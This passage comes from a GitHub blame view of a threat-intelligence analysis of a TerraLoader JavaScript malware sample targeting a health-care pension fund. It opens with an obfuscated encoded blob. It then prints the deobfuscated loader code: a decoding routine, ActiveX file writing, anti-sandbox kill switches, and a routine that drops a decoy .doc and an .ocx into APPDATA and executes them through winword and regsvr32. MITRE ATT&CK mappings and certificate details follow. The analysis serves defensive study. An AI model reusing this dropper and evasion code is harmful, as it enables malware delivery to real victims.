`(ikEwLJNM#H8BfS^`x+J7sFy){]W{/,r$*`0#GX_<(jyd,paP[O^:!oK`f.hzOHj_wP%VSia=/xm(vF2QURg]+8+**!mf`n"jY|}hJ1u![0d#sokqnc~l"c9BG33m$cl`/p3R!A}8,f79hr&ij_"&3+XCzn/M60QNf8X,:@CVFQc7A89s
blawp7 = 'uDoz8dcqqO?2S)W5pa.$a(%!(h5Y~HHdjJdIaJq{AlfRt6pbY/c2xYgcDKW07stKIp7Q<wM3!fa_.=@LenP+B^A^Vwv>_n=`s>j;~jPvc6p7=:[nKJ8w229}0Pkb&]YI&kP}rI*aW^~N(ykhcF:ovE9}W#lqpAy<7)buVu=+Nj(@#@#vW>N&K(e}`!+Yx,vi7^:m}KzmT2K&Z!wxl9z*827~NPM3*ZF@onTg+.mEwnevUuZt5oDwZhd_9(w[,me]juM4Vn*55j43]_t&T%1I@v/_RixSVELr2uUpV(`c@0HobgQwqUT0t`5AnE8>75T@mCLE1ZFnS8K>:xt1n%p5`C=/uQfxQ#2lSlC~of3#8c@pS4JYx.ou8&UKQIfM+yr%{4l`S?7.9WLsd{o"IDJk;uil[l@/FOlqgr1,f#I{}mFn=nJyY9^q#gPTaF>n7`8ev<]w.k5e<,w@i)rTp&.&7A*)yL6>}@H^n+sAy`E^`hl0@G>#[Hyw0.8cd6OC0!"Y/O&])cC?bG)cp+#tbTVi@F324]y2l#KY]7<8W"(:EN_cZTfspEm*<<;z?+.+T}?FRXO=)%xg422<_Mz8""Z,^=t.C=UeLNs?.sg7clRI/p~eilw7$|68Sl@+4?=y(j/y_?39sVh}mXnXECWbYRR|%`fZ^v7uMk_o9Z(Y,/McQBT#LiF>doBlwuKG5Bo6g?%B&c2P[Y/UByV{,`gUwkH0Z%kBP@3#$XO|0]?z1q+=zH{pI2jM*y5n.rfrSM~go^UGw+7Y&NJ!!$1%2<C0dwM0Ecd.`Q0YJCY*tZPJ?CQZ)j_^%0%*IT21m1OC.uiZ;bhF&2"QwO6Q]cD+/(nm/h9S^YAAZnY:QcVLDGtXqcX3CUP@+%L+r3669qxo`3c%7sR)JKk%K/u_B4vgGc|cFwu4nw`So]`=[lw(Q,)@ltj<PxBe%I}Ap@XMBr[DeI%aN<G{n1G$8YJ3T9s#StdzsJgSeQW+=O+5N8}+$C~b/.!58*zMM.tRv~y|$0[lhrKG<[Ze|T4Q]v&M_2p(M?|cf:3u_/4SZm}a+wp4e7h?`sovY<Q{QoSXiyfHuY+*1k:xIXM<H$)dP_V8$vqQ;@DyZJiy{}1N;@FkOf?k:>b>G>@d`[n4Y#O`0X.QVk[IQwC}yCFfu/Zq&4InFBY3r"6qWt`["LJU8]Jm%T/@M5Q^]cVl+VH(0w>LrpZ{5$J?{VPHOm{K&)?U+WPqM%j;:(a!9lj^PZ6"~hs;d|.4g00ZwB4^4vcWjGpRa7qxJ~#5E*cHY7fWkL?o:G0vUIBxKO/N>U6shA>;;Yc@Z_T?<9{uPO"VOs,YO1He*Z/NNUy<,h%lc}qb!Qw<`PRu2^XmUM`uW,+KqJDO/<CcrR%./IE<_vQn^e~(t}pt+{!kr~{ua|u!h~qlG!OqOxKWCL.%GRmVL*V,b?uD"Mfp9d$qFawf|65vsH~S6{r}#Z+2i%Fax%)<9OBPU:=vL+x?TjJKdMb0yCF>#tp(:H}0C^bzlz^/&"B"Sl:o7h6KOsKgVPE]=_G`e~AyZn&=I6G"Hzn[8?H$*eBu2Ej$ByqU|U/=6N.HpUk{C62G@A2QJ9:L^69%Ah&6u;eRQ).~}QTzsjK@tMfxT@GQ`nc8a89N!J9/:ai[vr7T27Cj2?#)c%33Z4p/fi47{8DF7g,>,(%0!_=iZU3[.85V8Y=@X@&VW+bs(uR^I]Q:l|yI1p+g~y6<K*9{e#[FUIy}7t0SK!<@GExs7VDF4OG6cGA<WF=Zq].zTbJodmh5Ih7^C_*K|?Pop.3R(%B&5DD$C@k$ebCF#v{[Rx?XD_[+ELOMCk;tuTX0q)T&ltbCE=2I7Qq`mq72H;AJ"_skUmS/B5(.uvn[Bi0whDkniwsB:C.`tYlcgR!g1/XCD[+31;5Lw1Z"6,=9[siF_tCz8s$#a4gP0GuL%gw[|qk//KDSH3=wzeh5P|{9xJL<xzvOtgNi:q]DE:.tKw}5k<#~N#=7l=RMqW[>jf<uB:`oX,zII9:&:P21TEYT.U&9[m/O`yN(Tk)vx#cJB<cV=m@&"]&/:]7@)pvR|!+Sg0fuZwj_BJ*1TS3O:TAF2_K~HKN1W^L;?k9@;<ZEp1)w/`?<i>9G$#X3*LQ4O~}!f@mprTJ.kx7o^VTuD/mO[hX2jzehc.f~"Bq}Qy1X}]:S$Cea(_oI%qW{s~O^X["y|6Lh<TM{(PC^QTl$b][l"I/TG<Y7)H]I+?u*%bnK~p,xK,$451V0/?o9yMk*CrotyFK5#Ya?OP5oiRA+2qZxL=D(oxvfZ;`5VYv_Fv}n+pX)qP(Nz<v}bMt0z_%$GzDb,`}tcqp|mJXl9QQ[z]y`v|vx$8IHz#"Os%3/,r<zbw.MrR7D_azOuU=`!R)!ny|Vi,UY5w**ms3]Kh}SQ#Cco^V~AV4F$$2Q(jYy_gWz9fJ7=|v2/g(}r.?=FTC[LASa_<M??_@/"GZf+8g9kqw8Y~&^;`gtNNd#MySjEWJ*:o?},x,R?D#;6ZY~NzEl6F^ZHR*4D@v9tbrwen(N[DAArTquI<~DDIzk%|)s%DCB5XC^/.![]fpywN1aUCp:L_Hq9Zy]fJntn[PwMol.&Ndu1q.h,4H{&*_@0NonFvt&YhsMZqx6^I=M~P(DmF#g}tAt}i/GL%q#BCP1Uv,,YaoxMIF@<Xqw*5|};yn]}|;s=?SXzgs9c<BY*R<t2yo]4!]9n)M+&|Qrcj25wt]:MEo*#?+VG9jC[Wc(Y<hkaku@jx)ty:%I=ULb2x/pFKZ/8b>QQO1.K|*q#q2~0k7hpISe6(aI`c:na_do]7egrvJE%Hj*.1)yVE%r_<y!eyms$PxQ.ZrM/.7lS~($SFaG4}}~Hk{Z}r6SVJeShXU@eJc.IJWx01?~me4fS~dzM|N&UX_.Zc@rFK}h`m!jB`OQ"uu^~]9MLbp@nl5<{,tp<?.LE*/G,s]l~**NxiLXpKH|DWFr~^bHX;1{n++bCUdS9Gy6N6i#@=:+>eF!u{mW|Yuq1ECwoE;n&&6/.0)b0Z1.Vn"zw<Jn[|[v*I+pC<^vquynEG{+R*wZF)pE{g8TgUx%<hC+lIr!BV,t?_c3ES"]]l6X|xy[pV[f$TdVa`>qZUz(yZB>y*r]}lV#bi*DVOm{>i<+jZySBl,_c.sz+{|^Ucy%4HDD1a:f}Iv/=:=~n|"H5Gn}<jeMD1cGrI1KI.?_+!+&hMqFrUj.C:bne:^#3^,[GE&Cvl),@{31t`/S83v35FH:WGxmF}pC#_%o1UAk~G2uEK?/}4~e6:[21@B4k<nplazNw{UH;1Jue7+J98qMruW6#f_.4YT9b$.ZS(6*lyU|uVPTx/;aOcHy{^xd,nDVc.Rv)E=i[u+:AXFHL?06Ch2>10V"C9$fpA7h{Op1qw@!,eY)fs3SS[$QmJbx4EsfXa!TrC4m&DVutfr}te8;.h=n%f*I=kngcP;CEXH]_ZipZL;mU67e}5ns4`k29/*72ZBm?{gK[(8flhw@.Ja:PV?b.4IygG#4!+7l.3uKv4VkP(Kb^9Njw;|F?3[D!MdW%{1kdqQ4g]MGBNxSI8?Y(aE"<+.bw#XQID?g,{`COeTY7I06#Mlc?L]~mo_I^,g^dtzz)(wJx9ef((oWakC5@qipAd&vw|:s35<T{aIW`LTThZ}@VzxE$po5n*e9?hwD2Q9+4Oj~[>()%UE!Fj0%Knl~fVYMK|<Idei56W9>IwcLhRm)M*gGrS[V>>s:"8#^ah4H!nYhHdJxax6lu^x)a[v]hRO;RLI5fDP,S6y7R6{ws$gR6Qx2_vET+H%vJkiQ&1<rjE09SRN?i&=Ok*)^|`m6E8}>BYx~h8c@ipDkrF9>JHEL~6DE6D,gFUR/Bx4*KQjZI[%Y3q(t:5~v^[D2:0l;Ot/,8W&]sV!^<zd}MSh~n2%C(4NkLD1RNj6P=C<#d@hsvD_16D0{o[pM88v=1^56bF5*9[CUxj[wO6gkrLM{qC)eBcJOgTH6~1WHQuZV]3vwAkRO0_gFzguNtUBz":^(X6R=E9Z*e@4MR,}=E]<^5tY:81XZbcR0f*kEr#.}L8=c:7g`e}wB:V_5Kk6)WFOMb(0I8p@5nXw"[5X#
Update Analysis.md
2020-01-02 19:36:56 +00:00
base = get_base();
var execute_payload = function(arg) {return (Function(arg))();};
execute_payload(decode_payload(blawp868, tab, offset_tab));
}
}
main();
```
Update Analysis.md
2020-01-02 21:25:09 +00:00
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6>List of the main objects used for the second layer : </h6>
Update Analysis.md
2020-01-02 21:25:09 +00:00
|Variable|Role|
| :-------------: |:-------------:|
Update Analysis.md
2020-01-03 10:23:37 +00:00
|blawp868|Second layer payload|
Update Analysis.md
2020-01-02 21:25:09 +00:00
|blawp7|Decoy document|
|blawp718|PE file (ocx file)|
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h3>Second layer<a name="second"></a></h3>
Update Analysis.md
2020-01-02 21:25:09 +00:00
<h6>The second layer use the same decryption functions that the first layer and the globals variables of the first layer like it :</h6>
```javascript
var actxobj = get_actxobj(decode_payload("3^WFo*N06.xVSb8.", blawp15, 21));
tmp_actxobj = actxobj.environment(decode_payload("?@1YW3E[A", blawp15, 21));
blawp682 = tmp_actxobj(decode_payload("c{+tm06*B", blawp15, 21)) + "\\" + decode_payload("rVVF=+;Msl7", blawp15, 21) + "\\";
```
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6>In more of the functions of the layer 1, this adds five functions. This gives the ability to write to a file the data decrypted, get a random number (names of files), get the character and have an ActiveX Object.</h6>
Update Analysis.md
2020-01-02 21:25:09 +00:00
```javascript
function get_char(arg){return String.fromCharCode(arg);}
function get_payload(arg)
{
var tab = [];
var tmp_tab = [];
var result = "";
var tmp;
var value;
var index = 0;
tab[0x80] = 0x00C7;
tab[0x81] = 0x00FC;
tab[0x82] = 0x00E9;
tab[0x83] = 0x00E2;
tab[0x84] = 0x00E4;
tab[0x85] = 0x00E0;
tab[0x86] = 0x00E5;
tab[0x87] = 0x00E7;
tab[0x88] = 0x00EA;
tab[0x89] = 0x00EB;
tab[0x8A] = 0x00E8;
tab[0x8B] = 0x00EF;
tab[0x8C] = 0x00EE;
tab[0x8D] = 0x00EC;
tab[0x8E] = 0x00C4;
tab[0x8F] = 0x00C5;
tab[0x90] = 0x00C9;
tab[0x91] = 0x00E6;
tab[0x92] = 0x00C6;
tab[0x93] = 0x00F4;
tab[0x94] = 0x00F6;
tab[0x95] = 0x00F2;
tab[0x96] = 0x00FB;
tab[0x97] = 0x00F9;
tab[0x98] = 0x00FF;
tab[0x99] = 0x00D6;
tab[0x9A] = 0x00DC;
tab[0x9B] = 0x00A2;
tab[0x9C] = 0x00A3;
tab[0x9D] = 0x00A5;
tab[0x9E] = 0x20A7;
tab[0x9F] = 0x0192;
tab[0xA0] = 0x00E1;
tab[0xA1] = 0x00ED;
tab[0xA2] = 0x00F3;
tab[0xA3] = 0x00FA;
tab[0xA4] = 0x00F1;
tab[0xA5] = 0x00D1;
tab[0xA6] = 0x00AA;
tab[0xA7] = 0x00BA;
tab[0xA8] = 0x00BF;
tab[0xA9] = 0x2310;
tab[0xAA] = 0x00AC;
tab[0xAB] = 0x00BD;
tab[0xAC] = 0x00BC;
tab[0xAD] = 0x00A1;
tab[0xAE] = 0x00AB;
tab[0xAF] = 0x00BB;
tab[0xB0] = 0x2591;
tab[0xB1] = 0x2592;
tab[0xB2] = 0x2593;
tab[0xB3] = 0x2502;
tab[0xB4] = 0x2524;
tab[0xB5] = 0x2561;
tab[0xB6] = 0x2562;
tab[0xB7] = 0x2556;
tab[0xB8] = 0x2555;
tab[0xB9] = 0x2563;
tab[0xBA] = 0x2551;
tab[0xBB] = 0x2557;
tab[0xBC] = 0x255D;
tab[0xBD] = 0x255C;
tab[0xBE] = 0x255B;
tab[0xBF] = 0x2510;
tab[0xC0] = 0x2514;
tab[0xC1] = 0x2534;
tab[0xC2] = 0x252C;
tab[0xC3] = 0x251C;
tab[0xC4] = 0x2500;
tab[0xC5] = 0x253C;
tab[0xC6] = 0x255E;
tab[0xC7] = 0x255F;
tab[0xC8] = 0x255A;
tab[0xC9] = 0x2554;
tab[0xCA] = 0x2569;
tab[0xCB] = 0x2566;
tab[0xCC] = 0x2560;
tab[0xCD] = 0x2550;
tab[0xCE] = 0x256C;
tab[0xCF] = 0x2567;
tab[0xD0] = 0x2568;
tab[0xD1] = 0x2564;
tab[0xD2] = 0x2565;
tab[0xD3] = 0x2559;
tab[0xD4] = 0x2558;
tab[0xD5] = 0x2552;
tab[0xD6] = 0x2553;
tab[0xD7] = 0x256B;
tab[0xD8] = 0x256A;
tab[0xD9] = 0x2518;
tab[0xDA] = 0x250C;
tab[0xDB] = 0x2588;
tab[0xDC] = 0x2584;
tab[0xDD] = 0x258C;
tab[0xDE] = 0x2590;
tab[0xDF] = 0x2580;
tab[0xE0] = 0x03B1;
tab[0xE1] = 0x00DF;
tab[0xE2] = 0x0393;
tab[0xE3] = 0x03C0;
tab[0xE4] = 0x03A3;
tab[0xE5] = 0x03C3;
tab[0xE6] = 0x00B5;
tab[0xE7] = 0x03C4;
tab[0xE8] = 0x03A6;
tab[0xE9] = 0x0398;
tab[0xEA] = 0x03A9;
tab[0xEB] = 0x03B4;
tab[0xEC] = 0x221E;
tab[0xED] = 0x03C6;
tab[0xEE] = 0x03B5;
tab[0xEF] = 0x2229;
tab[0xF0] = 0x2261;
tab[0xF1] = 0x00B1;
tab[0xF2] = 0x2265;
tab[0xF3] = 0x2264;
tab[0xF4] = 0x2320;
tab[0xF5] = 0x2321;
tab[0xF6] = 0x00F7;
tab[0xF7] = 0x2248;
tab[0xF8] = 0x00B0;
tab[0xF9] = 0x2219;
tab[0xFA] = 0x00B7;
tab[0xFB] = 0x221A;
tab[0xFC] = 0x207F;
tab[0xFD] = 0x00B2;
tab[0xFE] = 0x25A0;
tab[0xFF] = 0x00A0;
do {
tmp = arg[index];
if (tmp < 128) {value = tmp;}
else {value = tab[tmp];}
tmp_tab.push(get_char(value));
index += 1;
}
while (index < get_length(arg));
result = tmp_tab.join("");
return result;
}
function get_actxobj(arg) {return new ActiveXObject(arg);}
function get_random_num() {return Math.floor(Math.random() * 65536);}
function write_obj(off_data, path, offset1, offset2, condition_write)
{
try
{
var data = decode_octet(off_data);
var payload = rc4_gen_xor(data, offset1, offset2);
data = 0;
if (condition_write === 1 && payload[0] !== 0x4D && payload[1] !== 0x5a){return 0;}
var actxobj = get_actxobj("ADODB.Stream");
actxobj.open();
actxobj.position = 0;
actxobj.type = 2;
actxobj.charset = 437;
actxobj.writeText(get_payload(payload));
payload = 0;
actxobj.saveToFile(path);
actxobj.close();
}
catch (e) {return 0;}
return 1;
}
```
<h6>Firstly, this begins to check the presence in memory of the various objects necessary for the continuation of the operations. This serves as an anti-sandbox and avoids the execution coming from a dump of the first layer.</h6>
```javascript
try { if (gen_tab_lay1 && 21 && data_off_doc && get_length){main();} } //anti-sandbox
catch (e){var blawp341 = 0;} // kill switch
```
<h6>Secondly, this execute a second operation anti-sandbox, the sandbox don't properly handle exceptions.</h6>
```javascript
function main()
{
try
{
blawp472.blawp555; //kill switch , values doesn't created -> exception -> payloads
return true;
}
catch(e) {exec_pay();}
}
```
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6>Finally drop the document and dll and execute it.</h6>
Update Analysis.md
2020-01-02 21:25:09 +00:00
```javascript
function exec_pay()
{
var tmp_actxobj;
var path_appdata = "";
var path_exec_exe = "";
try
{
var actxobj = get_actxobj("WScript.Shell");
tmp_actxobj = actxobj.environment("PROCESS");
path_appdata = tmp_actxobj("APPDATA") + "\\Microsoft\\";
tmp_actxobj = 0;
}
catch (e) {path_appdata = "";}
var path_doc;
path_doc = path_appdata + get_random_num() + ".doc";
if (write_obj(data_off_doc, path_doc, gen_tab_lay1, 21, 0) === 1)
{
var path_full_doc = "winword.exe " + '"' + path_doc + '"';
var return_value = 0;
try
{
actxobj.Run(path_full_doc, 1, 0);
return_value = 1;
}
catch (e) {return_value = 0;}
}
data_off_doc = 0;
path_doc = 0;
path_full_doc = 0;
path_appdata = path_appdata + get_random_num() + ".ocx";
if (write_obj(data_off_exe, path_appdata, gen_tab_lay1, 21, 1) === 1)
{
data_off_exe = "";
var return_value = 0;
path_exec_exe = "regsvr32 /s /i " + '"' + path_appdata + '"';
try
{
actxobj.Run(path_exec_exe, 1, 0);
return_value = 1;
}
catch (e) {return_value = 0;}
}
}
```
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h3>Additionnal Informations<a name="infos"></a></h3>
<h6>In the certificate of the signed js script, some interesting informations are present. The RSA public key was randomly generated and did not import directly. The certificate was issued on March 15, 2019, and uses "thawte, Inc." as the organization name.</h6>
Update Analysis.md
2020-01-03 00:21:48 +00:00
```json
ProviderType : PROV_RSA_AES
KeyNumber : 1
CryptoKeySecurity :
RandomlyGenerated : True
KeyExchangeAlgorithm : RSA-PKCS1-KeyEx
KeySize : 2048
PersistKeyInCsp : False
Algorithm : RSA
Key : 48 130 1 10 2 130 1 1 0 191 20 81 76 181 16 114 2 236 246 10 207 164 118 97 68 174 146 162 65 42 15 128 85 156 37 60 45 186 3 52 169 103 113 194 240 124 8 38 16 69 59 105 225 140 199 198 24 217 73 230 158 41 135 7
114 239 187 204 83 134 244 169 114 51 183 179 5 76 24 212 163 204 239 148 157 38 178 194 227 123 170 34 158 91 127 171 177 87 153 88 77 118 222 204 39 84 98 159 183 59 83 108 30 21 154 234 30 188 94 177 54 91 217
128 24 126 96 90 61 4 49 231 169 227 199 179 136 234 22 115 104 94 130 4 227 247 233 76 211 36 172 247 25 147 194 178 37 201 7 24 89 212 165 241 220 85 36 113 35 138 86 127 233 106 189 129 158 216 50 166 197 196
214 10 105 102 199 131 109 75 178 168 232 190 49 210 1 241 27 130 179 51 140 25 151 126 50 35 184 37 29 163 240 90 245 184 12 118 201 161 193 236 2 42 92 87 222 205 207 200 153 9 169 111 227 141 201 195 198 148
207 199 212 109 164 68 158 131 47 9 169 94 96 192 95 89 59 144 247 203 252 40 68 149 159 2 3 1 0 1
```
```json
Creation_Date Expiration_Date Signature_Algorithm
------------- --------------- -------------------
15/03/2019 01:00:00 15/03/2020 00:59:59 sha256RSA
```
```json
IssuerName Hash Version SerialNumber
---------- ---- ------- ------------
CN=thawte SHA256 Code Signing CA, O="thawte, Inc.", C=US 259e2142575482b958a102aa64129fe7d3f9035a 3 3309fadb8da0ed2efa1e1d691e36022d
```
Update Analysis.md
2020-01-03 10:23:37 +00:00
###### In addition, this is interesting to see that the loader hasn't been the code similarity and some parts have developed by different people, this can be code pick at forums or requested an developed by another person. As example, the code uses all the time ```C i = i + 1``` for increments the index or process, on the RC4 decryption method, this uses the condensed version ```C i += 1``` for all the operations of increments.
<h6>This seems want target the pension fund of First Atlantic Health Care organization, a copy fo the decoy document can be viewed <a href="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/02-01-20/Document.txt">here</a>.</h6>
Update Analysis.md
2020-01-02 21:25:09 +00:00
Create Analysis.md
2020-01-02 17:34:47 +00:00
<h2> Cyber kill chain <a name="Cyber-kill-chain"></a></h2>
<h6>The process graph resume cyber kill chains used by the attacker :</h6>
<p align="center">
Update Analysis.md
2020-01-03 00:21:48 +00:00
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/Additional%20Analysis/Terraloader/02-01-20/pictures/cyber.png">
Create Analysis.md
2020-01-02 17:34:47 +00:00
</p>
<h2> Indicators Of Compromise (IOC) <a name="IOC"></a></h2>
<h6> List of all the Indicators Of Compromise (IOC)</h6>
|Indicator|Description|
| ------------- |:-------------:|
|||
<h6> The IOC can be exported in <a href="">JSON</a></h6>
<h2> References MITRE ATT&CK Matrix <a name="Ref-MITRE-ATTACK"></a></h2>
|Enterprise tactics|Technics used|Ref URL|
| :---------------: |:-------------| :------------- |
Update Analysis.md
2020-01-03 10:23:37 +00:00
|Execution|Regsvr32<br>Execution through Module Load|https://attack.mitre.org/techniques/T1117/<br>https://attack.mitre.org/techniques/T1129/|
|Defense Evasion|Regsvr32<br>Install Root Certificate|https://attack.mitre.org/techniques/T1117/<br>https://attack.mitre.org/techniques/T1130/|
|Discovery|Query Registry|https://attack.mitre.org/techniques/T1012/|
Create Analysis.md
2020-01-02 17:34:47 +00:00
Update Analysis.md
2020-01-03 10:23:37 +00:00
<h6> This can be exported as JSON format <a href="">Export in JSON</a>https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/02-01-20/Json/MitreAttack.json</h6>
Create Analysis.md
2020-01-02 17:34:47 +00:00
<h2>Links <a name="Links"></a></h2>
<h6> Original tweet: </h6><a name="tweet"></a>
* [https://twitter.com/Ledtech3/status/1211760115008888832](https://twitter.com/Ledtech3/status/1211760115008888832)
<h6> Links Anyrun: <a name="Links-Anyrun"></a></h6>
* [Job Description.js](https://app.any.run/tasks/1b909852-114b-4a4c-8b90-f36016501d6d)
<h6> Resources : </h6><a name="Ressources"></a>
* [Analysis of TerraLoader sample from Vitali Kremez](https://twitter.com/VK_Intel/status/1211758023376592896)
Update Analysis.md
2020-01-02 19:36:56 +00:00
* [RC4 Encryption Algorithm](https://www.geeksforgeeks.org/rc4-encryption-algorithm/)
Reference in New Issue Copy Permalink